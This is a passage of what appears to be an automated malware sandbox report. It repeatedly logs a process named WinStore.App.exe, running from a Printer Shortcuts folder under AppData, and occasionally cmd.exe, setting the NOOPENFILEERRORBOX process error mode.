Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process information set: NOOPENFILEERRORBOX
